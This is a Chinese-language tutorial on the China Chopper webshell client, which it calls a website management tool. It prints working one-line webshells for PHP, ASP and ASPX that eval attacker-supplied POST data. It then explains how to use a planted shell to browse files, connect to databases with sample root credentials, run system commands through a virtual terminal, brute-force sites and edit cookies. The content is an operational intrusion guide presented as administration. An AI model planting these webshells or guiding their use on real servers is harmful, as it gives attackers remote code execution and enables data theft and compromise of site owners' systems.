|
下载地址: x01 介绍 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。(引用于百度百科中国菜刀_百度百科) 菜刀的界面:
0x02 使用 1.常见的管理 右键空白处->添加
添加SHELL -> 进行相关的配置。
我的配置: 密码:key 脚本类型:PHP 最后->点击添加 相关的介绍: 这里的WEBSHELL是我们常说的一句话木马: PHP一句话木马:<?php @eval($_POST['key']);?> ASP一句话木马:<%eval request['key']%> ASPX一句话木马:<%@ Page Language="Jscript"%><%eval(Request.Item["key"],"unsafe");%> 眼尖的童鞋已经看到了三个里面都带有key这个单词,没错这个就是密码,大家可以自行修改为自己使用的密码。 功能概述:
文件管理: 打开方式 [右键WEBSHELL->单击文件管理]
管理方式 [右键上图中方框内的任何区域进行管理]
数据库管理: 打开方式 [右键WEBSHELL->数据库管理]
可以看到是空白的,这时候就需要配置数据库信息了。 配置方式1.[单击配置]
出现了一个配置窗口。(前提你要有网站数据库的配置信息才可以进行配置) 我的配置信息: 数据库类型:Mysql 用户名:root 密码:root 配置方式 2.[选择数据库]
可以看到红色方框那边有MYSQL、MSSQL、MSSQL2、ORACLE等数据库类型。 我是Mysql的就选择mysql的示例:
配置后 [单击提交]:
管理方式:
虚拟终端: 打开方式 [右键WEBSHELL->单击虚拟终端]
红色方框里是系统的一些信息。我们在D:\WWW\>后面输入相应的cmd命令即可(Linux就输入shell命令) 2.网站扫描 打开方式 [单击菜刀图标->单击网站扫描]
(也可以在软件里使用快捷键Alt+K去打开)
使用方法: 功能: 1.反向IP(reverse_ip) 2.爬虫(spider) 3.爆破(crack) 其他按照这些提示都应该能懂就不一一去说了。 3.浏览器功能
打开方法如上图示意。
对着网页进行右击:
上图是一些浏览器方面的功能。 单击扩展功能:
可以进行cookie的修改。 同时也可以单击菜刀图标->浏览器:
可以进行选择: #代表开启 可以单击进行取消开启。 4.其他功能 第一:设置菜刀启动密码(防止自己的WEBSHELL泄露出去)
打开方式 [单击菜刀图标->单击设置启动密码]
点击是,就成功设置密码为test。 然后我们关掉菜刀再打开菜刀: 输入我们的密码再可以设置新的密码:
我相信着点英语难不倒各位也不解释了。 也可以把启动密码取消掉:
第二:日程提醒,使用方法如下:
| 
